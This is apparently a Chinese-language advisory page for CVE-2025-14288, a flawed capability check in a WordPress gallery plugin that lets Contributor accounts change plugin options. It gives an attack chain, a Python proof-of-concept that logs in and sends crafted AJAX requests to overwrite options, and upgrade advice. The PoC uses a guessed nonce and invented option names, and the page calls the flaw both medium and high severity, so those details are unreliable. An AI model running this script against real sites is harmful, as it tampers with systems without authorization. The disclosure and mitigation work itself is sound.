CVE-2025-14288 WordPress Gallery Blocks插件权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-14288

漏洞类型

权限提升/访问控制不当

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

The Gallery Blocks with Lightbox WordPress插件

漏洞概述

CVE-2025-14288是WordPress平台The Gallery Blocks with Lightbox插件中的一个高危安全漏洞。该插件是一款功能丰富的画廊块插件，支持图片画廊、HTML5视频、YouTube、Vimeo视频画廊以及原生画廊的灯箱效果。漏洞存在于插件的AJAX处理程序`pgc_sgb_action_wizard`中，由于错误地使用了`edit_posts`权限检查而不是`manage_options`权限检查来验证`update_option`操作类型，导致权限验证机制存在严重缺陷。攻击者只需要拥有WordPress网站的Contributor（贡献者）级别账户即可利用此漏洞，修改插件的任意配置选项。由于插件设置以`pgc_sgb_*`为前缀存储，攻击者可以修改所有以该前缀开头的选项，可能导致网站功能异常或被恶意利用。此漏洞影响插件3.3.0及以下所有版本，于2025年12月13日被披露。

技术细节

该漏洞的根本原因在于WordPress权限检查机制的错误实现。在WordPress安全模型中，`manage_options`Capability要求用户具有管理员权限才能修改站点选项，而`edit_posts`Capability仅要求用户具有内容创作权限（如Author或Contributor角色）。插件开发者在实现`pgc_sgb_action_wizard`AJAX处理器时，使用了错误的Capability检查，导致低权限用户可以执行本应仅限管理员的操作。具体来说，当AJAX请求触发`update_option`操作类型时，代码仅验证用户是否具有`edit_posts`权限，而没有验证用户是否具有`manage_options`权限来修改站点选项。这使得攻击者可以通过构造特定的AJAX请求，指定`pgc_sgb_*`前缀的选项名称和新值，从而在未经适当授权的情况下修改这些配置。攻击者可能利用此漏洞修改插件的核心设置，甚至可能通过特定配置实现进一步的恶意操作。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress Contributor账户访问权限

STEP 2

步骤2

攻击者识别目标网站使用的The Gallery Blocks with Lightbox插件版本（需<=3.3.0）

STEP 3

步骤3

攻击者构造恶意的AJAX请求，目标是pgc_sgb_action_wizard处理器

STEP 4

步骤4

请求中设置action_type为update_option，并指定要修改的pgc_sgb_*前缀选项名称和值

STEP 5

步骤5

由于插件使用edit_posts而非manage_options进行权限检查， Contributor角色的攻击者通过验证

STEP 6

步骤6

插件错误地执行update_option操作，成功修改指定配置

STEP 7

步骤7

攻击者可能利用修改后的配置实现进一步攻击，如功能滥用或持久化访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-14288 PoC - Gallery Blocks Plugin Privilege Escalation
# Target: WordPress site with Gallery Blocks plugin <= 3.3.0

TARGET_URL = "https://target-site.com/wp-admin/admin-ajax.php"
USERNAME = "attacker_contributor"
PASSWORD = "password123"

def exploit_cve_2025_14288():
    """
    Exploit for CVE-2025-14288: Gallery Blocks Plugin Unauthorized Settings Modification
    
    This vulnerability allows authenticated users with Contributor-level access
    to modify arbitrary plugin settings prefixed with 'pgc_sgb_*' due to improper
    capability checks in the pgc_sgb_action_wizard AJAX handler.
    
    The plugin uses 'edit_posts' capability check instead of 'manage_options'
    for the 'update_option' action type.
    """
    
    # Step 1: Authenticate and get nonce
    session = requests.Session()
    
    # Login to WordPress
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    login_response = session.post(
        f"{TARGET_URL.replace('/admin-ajax.php', '/wp-login.php')}",
        data=login_data
    )
    
    if 'wordpress_logged_in' not in session.cookies:
        print("[-] Login failed")
        return False
    
    print("[+] Login successful as Contributor")
    
    # Step 2: Modify arbitrary plugin settings
    # The vulnerable action is 'pgc_sgb_action_wizard' with action_type 'update_option'
    exploit_data = {
        'action': 'pgc_sgb_action_wizard',
        'action_type': 'update_option',
        'option_name': 'pgc_sgb_arbitrary_setting',  # Any pgc_sgb_* option
        'option_value': 'malicious_value',
        'nonce': 'any_value_if_not_properly_validated'  # If nonce check is also flawed
    }
    
    # Alternative: Try to modify known sensitive options
    sensitive_options = [
        'pgc_sgb_settings',
        'pgc_sgb_api_keys',
        'pgc_sgb_configuration'
    ]
    
    for option in sensitive_options:
        exploit_data['option_name'] = option
        exploit_data['option_value'] = json.dumps({
            'modified': True,
            'attack_vector': 'CVE-2025-14288'
        })
        
        response = session.post(TARGET_URL, data=exploit_data)
        
        if response.status_code == 200:
            print(f"[+] Successfully modified option: {option}")
            print(f"[+] Response: {response.text}")
    
    return True

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-14288 Exploitation Tool")
    print("Gallery Blocks Plugin <= 3.3.0 Unauthorized Settings Modification")
    print("=" * 60)
    exploit_cve_2025_14288()

影响范围

The Gallery Blocks with Lightbox插件 < 3.3.1

防御指南

临时缓解措施

立即将The Gallery Blocks with Lightbox插件升级到3.3.1或最新版本。如果无法立即升级，可以暂时禁用该插件或限制非管理员用户的编辑权限。同时建议审查所有具有修改选项权限的用户账户，确保没有可疑的Contributor或Author级别账户存在。